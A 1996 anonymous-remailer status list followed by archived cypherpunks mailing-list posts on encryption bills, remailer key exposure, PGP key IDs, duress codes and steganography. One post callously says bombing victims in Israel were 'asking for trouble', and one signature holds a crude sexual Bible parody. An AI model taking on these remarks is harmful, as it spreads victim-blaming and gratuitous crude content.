http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 4 Mar 96 6:48:59 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
nymrod   nymrod@nym.alias.net             **+-*+***+*#    10:33  99.99%
vegas    remailer@vegas.gateway.com       **#+***#+###     3:24  99.99%
ecafe    cpunk@remail.ecafe.org           ############      :18  99.97%
treehole remailer@mockingbird.alias.net   +-+-----+--+  2:02:33  99.96%
hacktic  remailer@utopia.hacktic.nl       *********+**     8:08  99.95%
gondonym alias@nym.gondolin.org           ------------  3:27:17  99.94%
replay   remailer@replay.com              ****+**+****     5:07  99.91%
portal   hfinney@shell.portal.com         ###* +*--##+    25:24  99.87%
gondolin mix@remail.gondolin.org          -----+------  3:27:40  99.77%
alpha    alias@alpha.c2.org               *-+*+++ +.-+    58:19  99.76%
exon     remailer@remailer.nl.com         *+* .+*----+    46:22  99.75%
vishnu   mixmaster@vishnu.alias.net        -+-**** -**    32:44  99.70%
c2       remail@c2.org                     +-*-++++ -*    39:23  99.66%
flame    remailer@flame.alias.net         -----------   2:31:41  99.57%
tjava    remailer@tjava.com               #*-#######*#     3:08  99.19%
extropia remail@extropia.wimsey.com       ----___.+-   24:11:30  99.18%
nemesis  remailer@meaning.com             *-*+*-*** -*    24:02  98.98%
penet    anon@anon.penet.fi               .-.---...    23:23:07  97.58%
shinobi  remailer@shinobi.alias.net       +*****+*  ##    25:06  90.76%
lead     mix@zifi.genetics.utah.edu       +++++++  +-+    37:47  90.28%
alumni   hal@alumni.caltech.edu                 #- ##     22:41  80.89%
mix      mixmaster@remail.obscura.com     ..---+        5:31:48  34.72%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 4 Mar 1996 22:45:25 +0800
To: cypherpunks@toad.com
Subject: NYT on Crypto Bills
Message-ID: <199603041358.IAA23170@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, March 4, 1996, p. D4. 
 
 
   Compromise Bills Due on Data Encryption 
 
      Industry Opponents and Civil Libertarians Are Lukewarm, 
      at Best 
 
   By John Markoff 
 
 
   Legislation will be introduced in the House and the Senate 
   tomorrow in an effort to break the deadlock between the 
   computer industry and the Clinton Administration over the 
   control and export of software and hardware used to 
   scramble electronic data. 
 
   So far, though, the proposed measures have received only 
   cautious endorsement from industry executives, while 
   civil-liberties and privacy groups say they are worried 
   that the bills would enable the Government to decode 
   scrambled transmissions. 
 
   Senator Patrick J. Leahy, Democrat of Vermont, and 
   Representative Bob Goodlatte, Republican of Virginia, plan 
   to introduce similar bills that affirm the right of 
   Americans to use any type of data-coding equipment without 
   restriction and prohibit the mandatory use of special keys 
   that would allow law-enforcement agencies to read scrambled 
   data. Their bills would also make it a crime to use 
   encryption technology in committing a crime and would 
   permit the export of data-coding software and hardware if 
   similar technology was available from a foreign supplier. 
 
   Data-coding, or encryption, technology is based on 
   mathematical formulas that rely on the immense computing 
   challenge inherent in factoring large numbers. Until 
   recently, such technology was largely used by military and 
   intelligence organizations and by some corporations like 
   banks. As electronic mail and commerce have become 
   increasingly accessible, however, the technology has become 
   more controversial. 
 
   In April 1993, the Clinton Administration proposed a 
   national data-encryption standard known as Clipper, based 
   on a system that would have made it possible for 
   law-enforcement agencies, if authorized by a court, to 
   decode private voice and data communications. 
 
   The Clipper initiative has been strongly opposed by 
   industry executives and privacy advocates. They argue that 
   reliable coding technology is essential for commerce and 
   privacy protection on the Internet. They also say that 
   strict export rules are increasingly hindering the ability 
   of United States corporations to compete with foreign 
   suppliers. 
 
   The proposed legislation would ease some current 
   restrictions on the exporting of data-coding systems, but 
   civil libertarians still see areas of concern. 
 
   "The bills relax export controls, which is clearly a step 
   in the right direction," conceded Marc Rotenberg, director 
   of the Electronic Privacy Information Center, a Washington 
   research and policy organization. But the negatives, he 
   said, were that the bills opened the door to Government 
   access to private transactions "and criminalize the use of 
   cryptography when it is used to perpetrate a crime." 
 
   Industry officials said they expected the legislation to 
   stir little enthusiasm from corporate users. "Corporate 
   America is absolutely unwilling to give a third party 
   control of their data," said Jim Bidzos, chief executive of 
   RSA Data Security, a maker of encryption software based in 
   Redwood City, Calif. 
 
   [End] 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Tue, 5 Mar 1996 04:27:59 +0800
To: Adam Shostack <jya@pipeline.com (John Young)
Subject: Re: NYT on Crypto Bills
In-Reply-To: <adam@lighthouse.homeport.org>
Message-ID: <199603041810.KAA07446@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 4,  3:09pm, Adam Shostack wrote:
> 	Markoff shouyld know better than this.  There is a long
> history of business use of codes & ciphers, going back hundereds of
> years, and durring the heyday of the telegraph, there were fair size
> companies that created codebooks with (locally configurable)
> superencipherment systems for the market.

I thought that, for the most part, the telegraph systems described
above were to reduce cable charges (1 code word instead of a 15-word
sentence, a huge savings in those days).  Maybe it's the use to which
the encoding's put that's controversial, not the (idea of) encoding
itself.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 5 Mar 1996 05:37:10 +0800
To: cypherpunks@toad.com
Subject: Re:  (Fwd) Gov't run anon servers
Message-ID: <199603041852.KAA01295@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have run two remailers for about three years now, and I have never been
contacted in any way by law enforcement or government people in relation
to the operation of the remailers, or of any mail which has been sent
through them.  I get a fair number of complaints by private individuals,
but I have never heard anything from the government.

However, if I were a computer-savvy law enforcement agent, and I wanted
to track messages through one of my remailers, I would try a
technological approach.  I would first break the key for my remailer.
That is trivial.  The passphrase is in PLAINTEXT in the script file
which runs the remailer!.  It has to be.  That is true of all automated
remailers.  Anyone who can break into the remailer server and acquire
root permission can find the remailer secret key.  My keys have been
unchanged for three years.  Surely some enterprising hackers have
stolen the keys by now.

(That is why my keys are only < 512 bits.)

Then the LEA has to insert mail-monitoring software somewhere either in
the remailer system or on some connection to it.  That is probably more
difficult and may require cooperation from a system manager somewhere.  I
don't really know how hard it would be.  But breaking the key is the easy
part.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 5 Mar 1996 03:14:02 +0800
To: jya@pipeline.com (John Young)
Subject: Re: NYT on Crypto Bills
Message-ID: <v02140b0aad60c739b098@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Well, my first objection is that this law could become something
like mail fraud. If the term "data coding" is used, it should be
carefully defined. After all, this letter is coded in ASCII. My
voice communications are digitized and coded by some algorithm
defined by the phone company.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Mon, 4 Mar 1996 20:06:19 +0800
To: cypherpunks@toad.com
Subject: Re: Is there any work on entropy-lowering schemes?
In-Reply-To: <199603040206.SAA07584@ix14.ix.netcom.com>
Message-ID: <313AD43B.4A68@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
 
> Peter Wayner's work on Mimic Functions does just this sort of thing.
> You can describe a grammar, feed it random bits, and generate output that
> has the right statistics and can be reversed to get the original bits.
> His paper was on cs.cornell.edu a few years ago; don't know where
> to find it now.

If anyone finds out where Mimic has moved to I'd be very interested.

Thanks,

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 5 Mar 1996 03:06:21 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Problems with certificates.
In-Reply-To: <199603022121.NAA10418@ix8.ix.netcom.com>
Message-ID: <199603041635.LAA08126@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just a quick clarification...

> PGP KeyIDs are 8 hexes long (formerly 6), and there have been some natural
> collisions and it's easy to manufacture them.  On the other hand,
> the MD5 hash used for key fingerprints is 128 bits long, and
> cryptographically strong.

The printable part of the keyid is 8 hexes long.  The internal keyID
that PGP uses for choosing keys is actually 8 bytes, not 8 hexes.
Besides, its not the length that matters, but the security.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Tue, 5 Mar 1996 16:43:23 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Duress
In-Reply-To: <199603032311.PAA16326@netcom7.netcom.com>
Message-ID: <pgpmoose.199603041138.60725@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


  At  2:49 PM 3/3/96 -0500, Dr. Dimitri Vulis wrote:
  One of the private pilot magazines reported that a small plane operator
  used the code (because his airplane was, in fact, being hijacked).  When he
  landed the airplane, it was surrounded by LEA, and in the ensuing gun
  battle, everyone on the airplane died.  The went on to say that the safety
  of the passengers and airplane are the pilot's primary responsibility and
  that pilots should consider this incident when deciding to use the code.

Actually, that is an urban legend which grew out
of a real incident. What actually happened was
that they thought the private pilot couldn't
really have been hijacked, so when he landed *he*
was arrested for creating a public nuisance or
something. It wasn't till later, when they found
the shotgun-toting druggie, that they believed
him...

Greg Travis was the pilot's name, I imagine
AltaVista might find his original posting.

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 5 Mar 1996 03:06:26 +0800
To: cypherpunks@toad.com
Subject: PAB_lum
Message-ID: <199603041651.LAA12043@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-4-96. WSJ: 
 
   "U.S. Commission Recommends Staff Cuts at Intelligence 
   Agencies." 
 
      The most numerous cuts would be at the CIA, DIA and NSA. 
      Former Sen. Warren Rudman said the super-secret NSA, 
      which conducts various forms of electronic eavesdropping 
      abroad, was most in need of a cut that could provide 
      money for new computer-related technology and bring in 
      people with new technical skills. 
 
   3-3-96. NYT: 
 
   "Spy Pablum." [Editorial] 
 
      After a year of study and high public expectations, the 
      commission stepped up to this promising moment with all 
      the spine of a rag doll. There is nothing radical about 
      its report, which is precisely its problem. When it 
      comes to the larger picture of just what kind of 
      intelligence network America needs now that the cold war 
      is over, and whether some agencies ought to be combined 
      or eliminated altogether, the commission lacks 
      imagination and courage. 
 
   PAB_lum 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Mar 1996 19:37:43 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: PARTY PICTURES PLUS
Message-ID: <Pine.SUN.3.91.960304121112.10038A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

This should be my last post about my party [sound of crowd 
cheering].  Because several of you wanted more info about the
pictures and/or felt slighted by the file identification tabs,
I have added additional information:

		http://www.c2.org/party/masquerade/

Enjoy.  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 5 Mar 1996 07:17:25 +0800
To: cypherpunks@toad.com
Subject: Re: Duress
Message-ID: <199603042021.MAA25616@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:14 PM 3/4/96 -0500, jf_avon@citenet.net (Jean-Francois Avon (JFA
Technologies, QC, wrote:
>The transponder analogy might not be very accurate.
>
>When you fly in a controled airspace, the *controller* asks you to 
>dial in certain digits on the transponder.

The analogy may be reaching its elastic limit although you can use those
transponder codes when flying VFR, not in radio contact.  What I really
wanted to suggest is that we try to design (when we can) to minimize the
possibility of bad things happening to people who use duress codes.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Mar 1996 07:24:33 +0800
To: cypherpunks@toad.com
Subject: Bombings, Surveillance, and Free Societies
Message-ID: <ad609193050210049d08@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The recent bombings and similar events in public places in Israel (Hamas),
England (IRA), Japan (subway gas attack), and the U.S. (Oklahoma City) are
triggering calls for increased communications surveillance. Often the first
bombing is insufficient to trigger increased steps...but later events push
states to take stronger steps.

(In the U.S., for example, the OKC bombing was headline news for more than
a week, but resulted in no lasting changes affecting most of us, despite
the hysteria about the need to outlaw "militias" and "white supremacist"
groups. A second or third such bombing would likely produce new legislation
of a serious sort. This is the thrust of my article.)

Revolutionary theory says of course that this increased clampdown is a
desired effect of terrorist bombings and attacks. Fear and doubt.
Revolutionary ends rarely happen by slow, incremental movement. Hundreds of
examples, from the original "bomb-throwing anarchists" to the modern mix of
terrorist bands. The Red Brigade in Italy sought a fascist crackdown, and
the "strategy of tension" is common. (And even revolutionists of crypto
anarchist persuasion often think laws like the CDA are good in the long
run, by undermining respect for authority and triggering more extreme
reactions....)

CNN is reporting that U.S. intelligence agencies will share technology for
communications intercepts with the Israelis (more so than they already have
been doing. Maybe the "U.S.S. Liberty" will be anchored off of Haifa on a
permanent basis.

The implications for cryptography?

-- expect increased support for a "New World Order" to restrict
non-governmental access to strong crypto (via key escrow measures)

-- expect the various laws about "talking about explosives on the Net" to
be used to clamp down on various fringe groups

-- expect "national security" to become a bigger part of the political debate

-- expect more and bigger bombings, as the groups thinking about bombings
see how productive they are in accomplishing policy goals (such as ending
peace talks, triggering police state actions, etc.)

The inescapable fact is that free societies have numerous "soft targets"
than cannot be defended against such bombing attacks. Various public places
are "Schelling points" for attacks: crowded streets in Bogota, Tel Aviv,
New York, London, Paris. Ditto for subways, buses, government buildings,
sports arenas, etc.

(The 99+% of us who are not in these areas at any given time are pretty
safe, actually.)

I predict that it will take about 5 more major bombings in European and
American cities to trigger substantive changes in laws. If we look at how
easily the Communiations Decency Act (and the Wiretap Act, and similar
laws) sailed through Congress, I foresee serious terrorist activity as
triggering far-reaching restrictions on communications privacy, on
non-governmental use of encryption, and on what may be talked about openly
on the Net.

(Yes, I'm aware that there's a thing called the "First Amendment," lest you
lawyers point out to me that such prior restraints will never fly. Well,
how has the First Amendment stopped the government from restricting what I
can say about medicine, what abortion advice I can give, the "dirty words"
I choose to use, the supposedly libelous and slanderous things I can say,
etc.? Granted, these are not cases of prior restraint, but of actions taken
after the fact, via criminal and civil actions. Not much difference so far
as I can see.)

Personally, while I feel sorry for the dead in Israel, I think anyone who
moves to a small desert state surrounded on all sides by Arabs who want
their land back is asking for trouble.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 5 Mar 1996 08:33:57 +0800
To: Hal <cypherpunks@toad.com
Subject: Re:  (Fwd) Gov't run anon servers
Message-ID: <m0tthV7-000915C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 AM 3/4/96 -0800, Hal wrote:

>However, if I were a computer-savvy law enforcement agent, and I wanted
>to track messages through one of my remailers, I would try a
>technological approach.  I would first break the key for my remailer.
>That is trivial.  The passphrase is in PLAINTEXT in the script file
>which runs the remailer!.  It has to be.  That is true of all automated
>remailers. 

Maybe I just don't know much about automated remailers, but I don't 
understand why you said that the passphrase "has to be" in plaintext in the 
script file.  I find this hard to believe.  While I am far from an expert on 
cryptographic matters, I would assume that any received attempt at a 
password could be securely hashed (128 bits?) and compared with a pre-stored 
hash value.   If it's the same, it's assumed that the password was correct.

What's wrong with this?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Tue, 5 Mar 1996 07:05:39 +0800
To: cypherpunks@toad.com
Subject: art-stego
Message-ID: <9603041921.AA08825@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



The recent discussion "Chaff in the Channel" got me thinking about an  
alternative to hiding random bit streams in picture files.  The goal of  
steganography, as I see it, is to provide plausible deniability.  The  
problem with hiding bit streams is that you can never be sure if the  
opponent has developed an analysis technique to prove a particular file  
contains a suspicious bit pattern.

The alternative to hiding bit streams is to not hide them.  Use them to  
generate pretty pictures.  For example, modify a fractal image generator  
to accept a bit stream as input.  Use the bit settings to influence the  
values used to iterate the fractal function.  You don't have to use  
fractals, any function that produces pretty pictures would probably work  
as long as there was a way to extract the bit stream from the final  
picture.  Brute force would probably work fast enough for humans.

One possibility is a screen saver that produces an "infinite" variety of  
pretty pictures by generating a pseudo-random bit stream and using it to  
help generate the next background picture.  Occasionally, the picture  
might be so cool you will want to send it your friends or post it on the  
Net or just keep it around to look at.

The goal is to create an innocent reason for passing around unique images  
that contain random bit streams so we don't have to worry if somebody  
finds the bit stream.  If you live in a country that doesn't outlaw  
abstract art you have plausible deniability.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 5 Mar 1996 06:09:25 +0800
To: mike@fionn.lbl.gov
Subject: Re: NYT on Crypto Bills
Message-ID: <v02140b0cad60ee07cee9@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


>On Mar 4,  3:09pm, Adam Shostack wrote:
>>       Markoff shouyld know better than this.  There is a long
>> history of business use of codes & ciphers, going back
>>hundereds of
>> years, and durring the heyday of the telegraph, there were
>>fair size
>> companies that created codebooks with (locally configurable)
>> superencipherment systems for the market.
>
>I thought that, for the most part, the telegraph systems described
>above were to reduce cable charges (1 code word instead of a
>15-word
>sentence, a huge savings in those days).  Maybe it's the use to
>which
>the encoding's put that's controversial, not the (idea of) encoding
>itself.

Yes, this is true, but the government still spent plenty of time
getting a library of the standard libraries of commercial codes.
There are books and books about these codes. Naturally, some
were more oriented toward secrecy. Others were just so obscure
that you needed the code dictionary to understand them.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Tue, 5 Mar 1996 06:37:23 +0800
To: cypherpunks@toad.com
Subject: Re: Duress
Message-ID: <9603041922.AB05321@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


The transponder analogy might not be very accurate.

When you fly in a controled airspace, the *controller* asks you to 
dial in certain digits on the transponder.

If you do not dial them in, the controller will start harrassing you
for doing it and for not complying and for entering airspace
while unauthorized.

You have to do it.  depending on cockpit configuration, the hijacker
might very well have no choice but to let the pilot do it.

In any case, this is a situation where there are 3 persons involved
(hijacker, pilot and controller) vs 2 in the duress case

I would guess that most hijacks gets disclosed before they land because
there are so many ways that the pilot could stego a help message in the
flow of the numbers that are exchanged btwn him and the ground.

JFA
**** OLD KEY: USE ONLY FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 
Jean-Francois Avon <jf_avon@citenet.net>
84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Tue, 5 Mar 1996 06:33:31 +0800
To: Mike Fletcher <fletch@ain.bls.com>
Subject: Re: Chaff in the Channel (Stealth PGP work)
In-Reply-To: <9603021720.AA04821@outland>
Message-ID: <Pine.SUN.3.91.960304143635.4174C-100000@amanda>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Mar 1996, Mike Fletcher wrote:

> 	Just a stab, but maybe this might work:  Get two picures of
> with both at minimum sufficient size to carry the message.  Use the
> lsb's (or any bit for that matter) of the second image to XOR with the
> message before stego'ing (L'eggo my S'tego :) into the first.  Of course
> you'ld have to arrange which bit in the pad image will be used, how to
> associate the images, etc. before hand.

This is horrible.  If you have to ship the original untouched picture to 
someone, the man in the middle attack will work, furthermore, the image 
you use is likely already out there and when you ship the modified 
version to XOR, the man in the middle will be able to get the two.

Basically your idea gets back to the original key distribution problem 
that PK schemes have solved... if you have to use a secure channel to 
send a passphrase along, why not use that same channel for the message as 
well?

There are other ways to do this and NOT have it detected.  See my 
WNS210.ZIP package. :^)  (Shameless, plug, but hey, better secure than 
sorry.)

Now if I can find a way to get WNStorm to be somehow mind-melded with PGP 
and produce a public key Stego system, that would be worth the trouble. :)

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996] 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 5 Mar 1996 02:12:22 +0800
To: jya@pipeline.com (John Young)
Subject: Re: NYT on Crypto Bills
In-Reply-To: <199603041358.IAA23170@pipe1.nyc.pipeline.com>
Message-ID: <199603041509.KAA02654@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Markoff shouyld know better than this.  There is a long
history of business use of codes & ciphers, going back hundereds of
years, and durring the heyday of the telegraph, there were fair size
companies that created codebooks with (locally configurable)
superencipherment systems for the market.

Adam

John Young wrote:

|    Compromise Bills Due on Data Encryption 
|       Industry Opponents and Civil Libertarians Are Lukewarm, 
|       at Best 
|    By John Markoff 

|    Data-coding, or encryption, technology is based on 
|    mathematical formulas that rely on the immense computing 
|    challenge inherent in factoring large numbers. Until 
|    recently, such technology was largely used by military and 
|    intelligence organizations and by some corporations like 
|    banks. As electronic mail and commerce have become 
|    increasingly accessible, however, the technology has become 
|    more controversial. 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Mar 1996 10:59:32 +0800
To: cypherpunks@toad.com
Subject: Re:  (Fwd) Gov't run anon servers
Message-ID: <ad60b7a50a0210048ed0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:10 PM 3/4/96, jim bell wrote:
>At 10:52 AM 3/4/96 -0800, Hal wrote:

>>That is trivial.  The passphrase is in PLAINTEXT in the script file
>>which runs the remailer!.  It has to be.  That is true of all automated
>>remailers.
>
>Maybe I just don't know much about automated remailers, but I don't
>understand why you said that the passphrase "has to be" in plaintext in the
>script file.  I find this hard to believe.  While I am far from an expert on
>cryptographic matters, I would assume that any received attempt at a
>password could be securely hashed (128 bits?) and compared with a pre-stored
>hash value.   If it's the same, it's assumed that the password was correct.

The "passphrase" is not for access to the remailer, but so that the
remailer can itself decrypt incoming messages encrypted to its public key.
An automated remailer is like a little guy sitting at the machine, taking
in incoming messages, decrypting the ones that are addressed to him, and
taking furhter actions.

In Chaum's hardware-based "digital mix," the scripts, etc., for this are
stored in tamper-resistant hardware, making the attack Hal describes much
harder. (Chaum was thinking that mixes needed hardware security about 15
